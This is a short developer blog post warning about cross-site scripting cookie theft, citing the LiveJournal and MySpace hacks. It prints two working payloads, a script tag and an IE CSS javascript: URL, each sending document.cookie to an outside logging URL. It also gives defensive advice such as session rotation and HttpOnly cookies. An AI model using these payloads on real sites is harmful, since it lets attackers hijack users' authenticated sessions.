Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago, doesn’t mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client.
A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October it reminded us that we must be vigilant in filtering text which users post because a hacker could smuggle in some javascript code to maliciously use the site from the browsers of authenticated users.
By stealing a users cookies as the LiveJournal hack did, you don’t even have to cary out the attack in the users browser; you can do it elsewhere. Worst of all stealing cookies is EASY TO DO, and HARD TO PROTECT AGAINST.
Easy to do?
<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>
That was it. If i can get that code on a site where you are authenticated, I can become you.
We can also use another method in IE. Execute the javascript in CSS.
<style>
.getcookies{
background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');
}
</style>
<p class="getcookies"></p>
Any time you let users post text and you don’t religiously restrict the content, they can steal sessions. Scary? If you are a developer it better scare the hell out of you.
So, you might want to start believing every session is stollen. I didn’t even try to obfuscate that. Start rolling your sessions id’s from one value to another, expire them in short intervals. Track the referrer, user agent, etc. Some of these changes don’t add any real security, but they do add layers; and that always helps.
If you are not familiar with the MySpace XSS hack, read up. It’s rich on the details.
UPDATE: this is why HttpOnly flag for cookies is important to use for any session variable cookies